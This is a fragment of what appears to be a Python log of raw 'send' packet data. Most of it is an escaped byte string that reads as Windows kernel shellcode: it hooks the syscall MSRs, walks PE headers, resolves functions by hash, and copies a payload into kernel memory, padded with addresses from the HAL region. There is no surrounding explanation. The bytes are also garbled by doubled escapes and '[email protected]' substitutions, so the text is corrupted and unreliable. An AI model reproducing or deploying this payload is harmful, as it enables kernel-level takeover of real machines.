\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 21, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\